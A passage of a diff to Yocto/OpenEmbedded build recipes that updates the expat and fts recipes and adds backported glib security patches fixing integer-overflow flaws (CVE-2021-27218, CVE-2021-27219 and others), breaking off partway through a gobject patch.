+Date: Wed, 16 Jun 2021 19:00:30 +0200
 Subject: [PATCH] Add CC tag to build
 
-Add CC tag to build
-
 Upstream-Status: Pending
-Signed-off-by: Khem Raj <raj.khem@gmail.com>
-Signed-off-by: Dengke Du <dengke.du@windriver.com>
+Signed-off-by: Jasper Orschulko <jasper@fancydomain.eu>
 ---
- Makefile.in | 2 +-
+ Makefile.am | 2 +-
  1 file changed, 1 insertion(+), 1 deletion(-)
 
-diff --git a/Makefile.in b/Makefile.in
-index 9560a95..d444bd6 100644
---- a/Makefile.in
-+++ b/Makefile.in
-@@ -319,7 +319,7 @@ LIBCURRENT = @LIBCURRENT@
- LIBOBJS = @LIBOBJS@
- LIBREVISION = @LIBREVISION@
- LIBS = @LIBS@
--LIBTOOL = @LIBTOOL@
-+LIBTOOL = @LIBTOOL@ --tag CC
- LIPO = @LIPO@
- LN_S = @LN_S@
- LTLIBOBJS = @LTLIBOBJS@
+diff --git a/Makefile.am b/Makefile.am
+index 5e1d37dd..f7a6dece 100644
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -36,7 +36,7 @@ AUTOMAKE_OPTIONS = \
+     subdir-objects
+ 
+ ACLOCAL_AMFLAGS = -I m4
+-LIBTOOLFLAGS = --verbose
++LIBTOOLFLAGS = --verbose --tag=CC
+ 
+ SUBDIRS = lib # lib goes first to build first
+ if WITH_EXAMPLES
 -- 
-2.7.4
+2.32.0
 
diff --git a/meta/recipes-core/expat/expat_2.2.9.bb b/meta/recipes-core/expat/expat_2.2.9.bb
index 8f3db41352..8a5006e59a 100644
--- a/meta/recipes-core/expat/expat_2.2.9.bb
+++ b/meta/recipes-core/expat/expat_2.2.9.bb
@@ -1,22 +1,35 @@
 SUMMARY = "A stream-oriented XML parser library"
 DESCRIPTION = "Expat is an XML parser library written in C. It is a stream-oriented parser in which an application registers handlers for things the parser might find in the XML document (like start tags)"
-HOMEPAGE = "http://expat.sourceforge.net/"
+HOMEPAGE = "https://github.com/libexpat/libexpat"
 SECTION = "libs"
 LICENSE = "MIT"
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=5b8620d98e49772d95fc1d291c26aa79"
 
-SRC_URI = "${SOURCEFORGE_MIRROR}/expat/expat-${PV}.tar.bz2 \
+SRC_URI = "git://github.com/libexpat/libexpat.git;protocol=https;branch=master \
+           file://CVE-2013-0340.patch \
+           file://CVE-2021-45960.patch \
+           file://CVE-2021-46143.patch \
+           file://CVE-2022-22822-27.patch \
+           file://CVE-2022-23852.patch \
+           file://CVE-2022-23990.patch \
+           file://CVE-2022-25235.patch \
+           file://CVE-2022-25236.patch \
+           file://CVE-2022-25313.patch \
+           file://CVE-2022-25313-regression.patch \
+           file://CVE-2022-25314.patch \
+           file://CVE-2022-25315.patch \
            file://libtool-tag.patch \
-	  "
+           file://CVE-2022-40674.patch \
+           file://CVE-2022-43680.patch \
+         "
 
-SRC_URI[md5sum] = "875a2c2ff3e8eb9e5a5cd62db2033ab5"
-SRC_URI[sha256sum] = "f1063084dc4302a427dabcca499c8312b3a32a29b7d2506653ecc8f950a9a237"
+SRCREV = "a7bc26b69768f7fb24f0c7976fae24b157b85b13"
 
 inherit autotools lib_package
 
-do_configure_prepend () {
-	rm -f ${S}/conftools/libtool.m4
-}
+S = "${WORKDIR}/git/expat"
 
 BBCLASSEXTEND = "native nativesdk"
+
+CVE_PRODUCT = "expat libexpat"
diff --git a/meta/recipes-core/fts/fts_1.2.7.bb b/meta/recipes-core/fts/fts_1.2.7.bb
index 589ae0e916..d3b0f31eda 100644
--- a/meta/recipes-core/fts/fts_1.2.7.bb
+++ b/meta/recipes-core/fts/fts_1.2.7.bb
@@ -3,13 +3,14 @@
 
 SUMMARY = "Implementation of ftsfor musl libc packages"
 HOMEPAGE = "https://github.com/pullmoll/musl-fts"
+DESCRIPTION = "The musl-fts package implements the fts(3) functions fts_open, fts_read, fts_children, fts_set and fts_close, which are missing in musl libc."
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://COPYING;md5=5ffe358174aad383f1b69ce3b53da982"
 SECTION = "libs"
 
 SRCREV = "0bde52df588e8969879a2cae51c3a4774ec62472"
 
-SRC_URI = "git://github.com/pullmoll/musl-fts.git"
+SRC_URI = "git://github.com/pullmoll/musl-fts.git;branch=master;protocol=https"
 
 S = "${WORKDIR}/git"
 
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
new file mode 100644
index 0000000000..17dcada613
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2020-35457.patch
@@ -0,0 +1,41 @@
+From 63c5b62f0a984fac9a9700b12f54fe878e016a5d Mon Sep 17 00:00:00 2001
+From: Philip Withnall <withnall@endlessm.com>
+Date: Wed, 2 Sep 2020 12:38:09 +0100
+Subject: [PATCH] goption: Add a precondition to avoid GOptionEntry list
+ overflow
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+If the calling code adds more option entries than `G_MAXSIZE` then
+there’ll be an integer overflow. This seems vanishingly unlikely (given
+that all callers use static option entry lists), but add a precondition
+anyway.
+
+Signed-off-by: Philip Withnall <withnall@endlessm.com>
+
+Fixes: #2197
+---
+ glib/goption.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+CVE: CVE-2020-35457
+Upstream-Status: Backport [https://gitlab.gnome.org/GNOME/glib/-/commit/63c5b62f0a984fac9a9700b12f54fe878e016a5d]
+Comment: adjusted offset by -5 to fix patch fuzz warning
+
+diff --git a/glib/goption.c b/glib/goption.c
+index 9f5b977c4..bb9093a33 100644
+--- a/glib/goption.c
++++ b/glib/goption.c
+@@ -2417,6 +2417,8 @@ g_option_group_add_entries (GOptionGroup       *group,
+ 
+   for (n_entries = 0; entries[n_entries].long_name != NULL; n_entries++) ;
+ 
++  g_return_if_fail (n_entries <= G_MAXSIZE - group->n_entries);
++
+   group->entries = g_renew (GOptionEntry, group->entries, group->n_entries + n_entries);
+ 
+   /* group->entries could be NULL in the trivial case where we add no
+-- 
+2.20.1
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
new file mode 100644
index 0000000000..6257763d8d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27218.patch
@@ -0,0 +1,129 @@
+Backport of:
+
+From 0f384c88a241bbbd884487b1c40b7b75f1e638d3 Mon Sep 17 00:00:00 2001
+From: Krzesimir Nowak <qdlacz@gmail.com>
+Date: Wed, 10 Feb 2021 23:51:07 +0100
+Subject: [PATCH] gbytearray: Do not accept too large byte arrays
+
+GByteArray uses guint for storing the length of the byte array, but it
+also has a constructor (g_byte_array_new_take) that takes length as a
+gsize. gsize may be larger than guint (64 bits for gsize vs 32 bits
+for guint). It is possible to call the function with a value greater
+than G_MAXUINT, which will result in silent length truncation. This
+may happen as a result of unreffing GBytes into GByteArray, so rather
+be loud about it.
+
+(Test case tweaked by Philip Withnall.)
+
+(Backport 2.66: Add #include gstrfuncsprivate.h in the test case for
+`g_memdup2()`.)
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27218
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/garray.c      |  6 ++++++
+ glib/gbytes.c      |  4 ++++
+ glib/tests/bytes.c | 35 ++++++++++++++++++++++++++++++++++-
+ 3 files changed, 44 insertions(+), 1 deletion(-)
+
+--- a/glib/garray.c
++++ b/glib/garray.c
+@@ -2234,6 +2234,10 @@ g_byte_array_steal (GByteArray *array,
+  * Create byte array containing the data. The data will be owned by the array
+  * and will be freed with g_free(), i.e. it could be allocated using g_strdup().
+  *
++ * Do not use it if @len is greater than %G_MAXUINT. #GByteArray
++ * stores the length of its data in #guint, which may be shorter than
++ * #gsize.
++ *
+  * Since: 2.32
+  *
+  * Returns: (transfer full): a new #GByteArray
+@@ -2245,6 +2249,8 @@ g_byte_array_new_take (guint8 *data,
+   GByteArray *array;
+   GRealArray *real;
+ 
++  g_return_val_if_fail (len <= G_MAXUINT, NULL);
++
+   array = g_byte_array_new ();
+   real = (GRealArray *)array;
+   g_assert (real->data == NULL);
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -519,6 +519,10 @@ g_bytes_unref_to_data (GBytes *bytes,
+  * g_bytes_new(), g_bytes_new_take() or g_byte_array_free_to_bytes(). In all
+  * other cases the data is copied.
+  *
++ * Do not use it if @bytes contains more than %G_MAXUINT
++ * bytes. #GByteArray stores the length of its data in #guint, which
++ * may be shorter than #gsize, that @bytes is using.
++ *
+  * Returns: (transfer full): a new mutable #GByteArray containing the same byte data
+  *
+  * Since: 2.32
+--- a/glib/tests/bytes.c
++++ b/glib/tests/bytes.c
+@@ -10,12 +10,12 @@
+  */
+ 
+ #undef G_DISABLE_ASSERT
+-#undef G_LOG_DOMAIN
+ 
+ #include <stdio.h>
+ #include <stdlib.h>
+ #include <string.h>
+ #include "glib.h"
++#include "glib/gstrfuncsprivate.h"
+ 
+ /* Keep in sync with glib/gbytes.c */
+ struct _GBytes
+@@ -334,6 +334,38 @@ test_to_array_transferred (void)
+ }
+ 
+ static void
++test_to_array_transferred_oversize (void)
++{
++  g_test_message ("g_bytes_unref_to_array() can only take GBytes up to "
++                  "G_MAXUINT in length; test that longer ones are rejected");
++
++  if (sizeof (guint) >= sizeof (gsize))
++    {
++      g_test_skip ("Skipping test as guint is not smaller than gsize");
++    }
++  else if (g_test_undefined ())
++    {
++      GByteArray *array = NULL;
++      GBytes *bytes = NULL;
++      gpointer data = g_memdup2 (NYAN, N_NYAN);
++      gsize len = ((gsize) G_MAXUINT) + 1;
++
++      bytes = g_bytes_new_take (data, len);
++      g_test_expect_message (G_LOG_DOMAIN, G_LOG_LEVEL_CRITICAL,
++                             "g_byte_array_new_take: assertion 'len <= G_MAXUINT' failed");
++      array = g_bytes_unref_to_array (g_steal_pointer (&bytes));
++      g_test_assert_expected_messages ();
++      g_assert_null (array);
++
++      g_free (data);
++    }
++  else
++    {
++      g_test_skip ("Skipping test as testing undefined behaviour is disabled");
++    }
++}
++
++static void
+ test_to_array_two_refs (void)
+ {
+   gconstpointer memory;
+@@ -410,6 +442,7 @@ main (int argc, char *argv[])
+   g_test_add_func ("/bytes/to-array/transfered", test_to_array_transferred);
+   g_test_add_func ("/bytes/to-array/two-refs", test_to_array_two_refs);
+   g_test_add_func ("/bytes/to-array/non-malloc", test_to_array_non_malloc);
++  g_test_add_func ("/bytes/to-array/transferred/oversize", test_to_array_transferred_oversize);
+   g_test_add_func ("/bytes/null", test_null);
+ 
+   return g_test_run ();
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
new file mode 100644
index 0000000000..2af9dd6aa4
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-01.patch
@@ -0,0 +1,170 @@
+Backport of:
+
+From 5e5f75a77e399c638be66d74e5daa8caeb433e00 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:30:52 +0000
+Subject: [PATCH 01/11] gstrfuncs: Add internal g_memdup2() function
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This will replace the existing `g_memdup()` function for use within
+GLib. It has an unavoidable security flaw of taking its `byte_size`
+argument as a `guint` rather than as a `gsize`. Most callers will
+expect it to be a `gsize`, and may pass in large values which could
+silently be truncated, resulting in an undersize allocation compared
+to what the caller expects.
+
+This could lead to a classic buffer overflow vulnerability for many
+callers of `g_memdup()`.
+
+`g_memdup2()`, in comparison, takes its `byte_size` as a `gsize`.
+
+Spotted by Kevin Backhouse of GHSL.
+
+In GLib 2.68, `g_memdup2()` will be a new public API. In this version
+for backport to older stable releases, it’s a new `static inline` API
+in a private header, so that use of `g_memdup()` within GLib can be
+fixed without adding a new API in a stable release series.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ docs/reference/glib/meson.build |  1 +
+ glib/gstrfuncsprivate.h         | 55 +++++++++++++++++++++++++++++++++
+ glib/meson.build                |  1 +
+ glib/tests/strfuncs.c           | 23 ++++++++++++++
+ 4 files changed, 80 insertions(+)
+ create mode 100644 glib/gstrfuncsprivate.h
+
+--- a/docs/reference/glib/meson.build
++++ b/docs/reference/glib/meson.build
+@@ -22,6 +22,7 @@ if get_option('gtk_doc')
+     'gprintfint.h',
+     'gmirroringtable.h',
+     'gscripttable.h',
++    'gstrfuncsprivate.h',
+     'glib-mirroring-tab',
+     'gnulib',
+     'pcre',
+--- /dev/null
++++ b/glib/gstrfuncsprivate.h
+@@ -0,0 +1,55 @@
++/* GLIB - Library of useful routines for C programming
++ * Copyright (C) 1995-1997  Peter Mattis, Spencer Kimball and Josh MacDonald
++ *
++ * This library is free software; you can redistribute it and/or
++ * modify it under the terms of the GNU Lesser General Public
++ * License as published by the Free Software Foundation; either
++ * version 2.1 of the License, or (at your option) any later version.
++ *
++ * This library is distributed in the hope that it will be useful,
++ * but WITHOUT ANY WARRANTY; without even the implied warranty of
++ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
++ * Lesser General Public License for more details.
++ *
++ * You should have received a copy of the GNU Lesser General Public
++ * License along with this library; if not, see <http://www.gnu.org/licenses/>.
++ */
++
++#include <glib.h>
++#include <string.h>
++
++/*
++ * g_memdup2:
++ * @mem: (nullable): the memory to copy.
++ * @byte_size: the number of bytes to copy.
++ *
++ * Allocates @byte_size bytes of memory, and copies @byte_size bytes into it
++ * from @mem. If @mem is %NULL it returns %NULL.
++ *
++ * This replaces g_memdup(), which was prone to integer overflows when
++ * converting the argument from a #gsize to a #guint.
++ *
++ * This static inline version is a backport of the new public API from
++ * GLib 2.68, kept internal to GLib for backport to older stable releases.
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2319.
++ *
++ * Returns: (nullable): a pointer to the newly-allocated copy of the memory,
++ *    or %NULL if @mem is %NULL.
++ * Since: 2.68
++ */
++static inline gpointer
++g_memdup2 (gconstpointer mem,
++           gsize         byte_size)
++{
++  gpointer new_mem;
++
++  if (mem && byte_size != 0)
++    {
++      new_mem = g_malloc (byte_size);
++      memcpy (new_mem, mem, byte_size);
++    }
++  else
++    new_mem = NULL;
++
++  return new_mem;
++}
+--- a/glib/meson.build
++++ b/glib/meson.build
+@@ -268,6 +268,7 @@ glib_sources = files(
+   'gslist.c',
+   'gstdio.c',
+   'gstrfuncs.c',
++  'gstrfuncsprivate.h',
+   'gstring.c',
+   'gstringchunk.c',
+   'gtestutils.c',
+--- a/glib/tests/strfuncs.c
++++ b/glib/tests/strfuncs.c
+@@ -32,6 +32,8 @@
+ #include <string.h>
+ #include "glib.h"
+ 
++#include "gstrfuncsprivate.h"
++
+ #if defined (_MSC_VER) && (_MSC_VER <= 1800)
+ #define isnan(x) _isnan(x)
+ 
+@@ -219,6 +221,26 @@ test_memdup (void)
+   g_free (str_dup);
+ }
+ 
++/* Testing g_memdup2() function with various positive and negative cases */
++static void
++test_memdup2 (void)
++{
++  gchar *str_dup = NULL;
++  const gchar *str = "The quick brown fox jumps over the lazy dog";
++
++  /* Testing negative cases */
++  g_assert_null (g_memdup2 (NULL, 1024));
++  g_assert_null (g_memdup2 (str, 0));
++  g_assert_null (g_memdup2 (NULL, 0));
++
++  /* Testing normal usage cases */
++  str_dup = g_memdup2 (str, strlen (str) + 1);
++  g_assert_nonnull (str_dup);
++  g_assert_cmpstr (str, ==, str_dup);
++
++  g_free (str_dup);
++}
++
+ /* Testing g_strpcpy() function with various positive and negative cases */
+ static void
+ test_stpcpy (void)
+@@ -2523,6 +2545,7 @@ main (int   argc,
+   g_test_add_func ("/strfuncs/has-prefix", test_has_prefix);
+   g_test_add_func ("/strfuncs/has-suffix", test_has_suffix);
+   g_test_add_func ("/strfuncs/memdup", test_memdup);
++  g_test_add_func ("/strfuncs/memdup2", test_memdup2);
+   g_test_add_func ("/strfuncs/stpcpy", test_stpcpy);
+   g_test_add_func ("/strfuncs/str_match_string", test_str_match_string);
+   g_test_add_func ("/strfuncs/str_tokenize_and_fold", test_str_tokenize_and_fold);
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
new file mode 100644
index 0000000000..20137ea5f3
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-02.patch
@@ -0,0 +1,249 @@
+From be8834340a2d928ece82025463ae23dee2c333d0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:37:56 +0000
+Subject: [PATCH 02/11] gio: Use g_memdup2() instead of g_memdup() in obvious
+ places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdbusconnection.c                 | 5 +++--
+ gio/gdbusinterfaceskeleton.c          | 3 ++-
+ gio/gfile.c                           | 7 ++++---
+ gio/gsettingsschema.c                 | 5 +++--
+ gio/gwin32registrykey.c               | 8 +++++---
+ gio/tests/async-close-output-stream.c | 6 ++++--
+ gio/tests/gdbus-export.c              | 5 +++--
+ gio/win32/gwinhttpfile.c              | 9 +++++----
+ 8 files changed, 29 insertions(+), 19 deletions(-)
+
+--- a/gio/gdbusconnection.c
++++ b/gio/gdbusconnection.c
+@@ -110,6 +110,7 @@
+ #include "gasyncinitable.h"
+ #include "giostream.h"
+ #include "gasyncresult.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gmarshal-internal.h"
+ 
+@@ -4007,7 +4008,7 @@ _g_dbus_interface_vtable_copy (const GDB
+   /* Don't waste memory by copying padding - remember to update this
+    * when changing struct _GDBusInterfaceVTable in gdbusconnection.h
+    */
+-  return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++  return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+ 
+ static void
+@@ -4024,7 +4025,7 @@ _g_dbus_subtree_vtable_copy (const GDBus
+   /* Don't waste memory by copying padding - remember to update this
+    * when changing struct _GDBusSubtreeVTable in gdbusconnection.h
+    */
+-  return g_memdup ((gconstpointer) vtable, 3 * sizeof (gpointer));
++  return g_memdup2 ((gconstpointer) vtable, 3 * sizeof (gpointer));
+ }
+ 
+ static void
+--- a/gio/gdbusinterfaceskeleton.c
++++ b/gio/gdbusinterfaceskeleton.c
+@@ -28,6 +28,7 @@
+ #include "gdbusmethodinvocation.h"
+ #include "gdbusconnection.h"
+ #include "gmarshal-internal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtask.h"
+ #include "gioerror.h"
+ 
+@@ -701,7 +702,7 @@ add_connection_locked (GDBusInterfaceSke
+        * properly before building the hooked_vtable, so we create it
+        * once at the last minute.
+        */
+-      interface_->priv->hooked_vtable = g_memdup (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
++      interface_->priv->hooked_vtable = g_memdup2 (g_dbus_interface_skeleton_get_vtable (interface_), sizeof (GDBusInterfaceVTable));
+       interface_->priv->hooked_vtable->method_call = skeleton_intercept_handle_method_call;
+     }
+ 
+--- a/gio/gfile.c
++++ b/gio/gfile.c
+@@ -60,6 +60,7 @@
+ #include "gasyncresult.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+ 
+ 
+ /**
+@@ -7854,7 +7855,7 @@ measure_disk_usage_progress (gboolean re
+   g_main_context_invoke_full (g_task_get_context (task),
+                               g_task_get_priority (task),
+                               measure_disk_usage_invoke_progress,
+-                              g_memdup (&progress, sizeof progress),
++                              g_memdup2 (&progress, sizeof progress),
+                               g_free);
+ }
+ 
+@@ -7872,7 +7873,7 @@ measure_disk_usage_thread (GTask
+                                  data->progress_callback ? measure_disk_usage_progress : NULL, task,
+                                  &result.disk_usage, &result.num_dirs, &result.num_files,
+                                  &error))
+-    g_task_return_pointer (task, g_memdup (&result, sizeof result), g_free);
++    g_task_return_pointer (task, g_memdup2 (&result, sizeof result), g_free);
+   else
+     g_task_return_error (task, error);
+ }
+@@ -7896,7 +7897,7 @@ g_file_real_measure_disk_usage_async (GF
+ 
+   task = g_task_new (file, cancellable, callback, user_data);
+   g_task_set_source_tag (task, g_file_real_measure_disk_usage_async);
+-  g_task_set_task_data (task, g_memdup (&data, sizeof data), g_free);
++  g_task_set_task_data (task, g_memdup2 (&data, sizeof data), g_free);
+   g_task_set_priority (task, io_priority);
+ 
+   g_task_run_in_thread (task, measure_disk_usage_thread);
+--- a/gio/gsettingsschema.c
++++ b/gio/gsettingsschema.c
+@@ -20,6 +20,7 @@
+ 
+ #include "gsettingsschema-internal.h"
+ #include "gsettings.h"
++#include "gstrfuncsprivate.h"
+ 
+ #include "gvdb/gvdb-reader.h"
+ #include "strinfo.c"
+@@ -1067,9 +1068,9 @@ g_settings_schema_list_children (GSettin
+ 
+       if (g_str_has_suffix (key, "/"))
+         {
+-          gint length = strlen (key);
++          gsize length = strlen (key);
+ 
+-          strv[j] = g_memdup (key, length);
++          strv[j] = g_memdup2 (key, length);
+           strv[j][length - 1] = '\0';
+           j++;
+         }
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -28,6 +28,8 @@
+ #include <ntstatus.h>
+ #include <winternl.h>
+ 
++#include "gstrfuncsprivate.h"
++
+ #ifndef _WDMDDK_
+ typedef enum _KEY_INFORMATION_CLASS {
+   KeyBasicInformation,
+@@ -247,7 +249,7 @@ g_win32_registry_value_iter_copy (const
+   new_iter->value_name_size = iter->value_name_size;
+ 
+   if (iter->value_data != NULL)
+-    new_iter->value_data = g_memdup (iter->value_data, iter->value_data_size);
++    new_iter->value_data = g_memdup2 (iter->value_data, iter->value_data_size);
+ 
+   new_iter->value_data_size = iter->value_data_size;
+ 
+@@ -268,8 +270,8 @@ g_win32_registry_value_iter_copy (const
+   new_iter->value_data_expanded_charsize = iter->value_data_expanded_charsize;
+ 
+   if (iter->value_data_expanded_u8 != NULL)
+-    new_iter->value_data_expanded_u8 = g_memdup (iter->value_data_expanded_u8,
+-                                                 iter->value_data_expanded_charsize);
++    new_iter->value_data_expanded_u8 = g_memdup2 (iter->value_data_expanded_u8,
++                                                  iter->value_data_expanded_charsize);
+ 
+   new_iter->value_data_expanded_u8_size = iter->value_data_expanded_charsize;
+ 
+--- a/gio/tests/async-close-output-stream.c
++++ b/gio/tests/async-close-output-stream.c
+@@ -24,6 +24,8 @@
+ #include <stdlib.h>
+ #include <string.h>
+ 
++#include "gstrfuncsprivate.h"
++
+ #define DATA_TO_WRITE "Hello world\n"
+ 
+ typedef struct
+@@ -147,9 +149,9 @@ prepare_data (SetupData *data,
+ 
+   data->expected_size = g_memory_output_stream_get_data_size (G_MEMORY_OUTPUT_STREAM (data->data_stream));
+ 
+-  g_assert_cmpint (data->expected_size, >, 0);
++  g_assert_cmpuint (data->expected_size, >, 0);
+ 
+-  data->expected_output = g_memdup (written, (guint)data->expected_size);
++  data->expected_output = g_memdup2 (written, data->expected_size);
+ 
+   /* then recreate the streams and prepare them for the asynchronous close */
+   destroy_streams (data);
+--- a/gio/tests/gdbus-export.c
++++ b/gio/tests/gdbus-export.c
+@@ -23,6 +23,7 @@
+ #include <string.h>
+ 
+ #include "gdbus-tests.h"
++#include "gstrfuncsprivate.h"
+ 
+ /* all tests rely on a shared mainloop */
+ static GMainLoop *loop = NULL;
+@@ -671,7 +672,7 @@ subtree_introspect (GDBusConnection
+       g_assert_not_reached ();
+     }
+ 
+-  return g_memdup (interfaces, 2 * sizeof (void *));
++  return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+ 
+ static const GDBusInterfaceVTable *
+@@ -727,7 +728,7 @@ dynamic_subtree_introspect (GDBusConnect
+ {
+   const GDBusInterfaceInfo *interfaces[2] = { &dyna_interface_info, NULL };
+ 
+-  return g_memdup (interfaces, 2 * sizeof (void *));
++  return g_memdup2 (interfaces, 2 * sizeof (void *));
+ }
+ 
+ static const GDBusInterfaceVTable *
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -29,6 +29,7 @@
+ #include "gio/gfile.h"
+ #include "gio/gfileattribute.h"
+ #include "gio/gfileinfo.h"
++#include "gstrfuncsprivate.h"
+ #include "gwinhttpfile.h"
+ #include "gwinhttpfileinputstream.h"
+ #include "gwinhttpfileoutputstream.h"
+@@ -393,10 +394,10 @@
+   child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+   child->vfs = winhttp_file->vfs;
+   child->url = winhttp_file->url;
+-  child->url.lpszScheme = g_memdup (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+-  child->url.lpszHostName = g_memdup (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+-  child->url.lpszUserName = g_memdup (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+-  child->url.lpszPassword = g_memdup (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++  child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
++  child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
++  child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
++  child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
+   child->url.lpszUrlPath = wnew_path;
+   child->url.dwUrlPathLength = wcslen (wnew_path);
+   child->url.lpszExtraInfo = NULL;
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
new file mode 100644
index 0000000000..eceff161a6
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-03.patch
@@ -0,0 +1,131 @@
+From 6110caea45b235420b98cd41d845cc92238f6781 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:39:25 +0000
+Subject: [PATCH 03/11] gobject: Use g_memdup2() instead of g_memdup() in
+ obvious places
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Convert all the call sites which use `g_memdup()`’s length argument
+trivially (for example, by passing a `sizeof()`), so that they use
+`g_memdup2()` instead.
+
+In almost all of these cases the use of `g_memdup()` would not have
+caused problems, but it will soon be deprecated, so best port away from
+it.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gobject/gsignal.c     | 3 ++-
+ gobject/gtype.c       | 9 +++++----
+ gobject/gtypemodule.c | 3 ++-
+ gobject/tests/param.c | 4 +++-
+ 4 files changed, 12 insertions(+), 7 deletions(-)
+
+--- a/gobject/gsignal.c
++++ b/gobject/gsignal.c
+@@ -28,6 +28,7 @@
+ #include <signal.h>
+ 
+ #include "gsignal.h"
++#include "gstrfuncsprivate.h"
+ #include "gtype-private.h"
+ #include "gbsearcharray.h"
+ #include "gvaluecollector.h"
+@@ -1809,7 +1810,7 @@ g_signal_newv (const gchar       *signal
+   node->single_va_closure_is_valid = FALSE;
+   node->flags = signal_flags & G_SIGNAL_FLAGS_MASK;
+   node->n_params = n_params;
+-  node->param_types = g_memdup (param_types, sizeof (GType) * n_params);
++  node->param_types = g_memdup2 (param_types, sizeof (GType) * n_params);
+   node->return_type = return_type;
+   node->class_closure_bsa = NULL;
+   if (accumulator)
+--- a/gobject/gtype.c
++++ b/gobject/gtype.c
